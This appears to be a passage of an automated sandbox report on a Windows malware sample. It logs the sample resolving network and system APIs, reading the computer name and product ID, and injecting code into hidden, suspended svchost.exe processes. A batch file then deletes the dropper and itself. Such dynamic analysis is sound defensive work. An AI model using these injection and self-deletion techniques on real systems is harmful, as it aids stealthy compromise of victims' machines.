| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x748e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
3 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x772900a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x7728f9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77291314 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x772919b0 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended |
|
1 | |
| Mutex | Create | mutex_name = C2E6ECE9938A43206F172A85684E36DB |
|
1 | |
| Mutex | Open | mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Mutex | Open | mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x634, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = CEE48AFA231AB21CA6E2437DB844BAD7 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xb0000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xb0000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc76c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc77d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc7d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0xb95bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 | |
| Mutex | Open | mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x5fc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = 1F4C22565107A34AD73CB0F585F8F77C |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:33, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:08:40 |
| Information | Value |
|---|---|
| PID | 0x7f0 |
| Parent PID | 0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7FC
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-01-10 18:52:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 156422 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x49fa0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75a1a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75a04a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75a1a79d |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x75702102 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x75703352 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x75703825 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 200 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 189 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 185 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 127 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 63 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
2 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:03:34, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:06:39 |
| Information | Value |
|---|---|
| PID | 0x634 |
| Parent PID | 0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5A0
0x
948
0x
A10
0x
918
0x
910
0x
84
0x
A60
0x
98C
0x
9C4
0x
C4
0x
984
0x
978
0x
95C
0x
A70
0x
138
0x
708
0x
AFC
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000cbfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x00160000 | 0x0019bfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable |
|
|
|
|
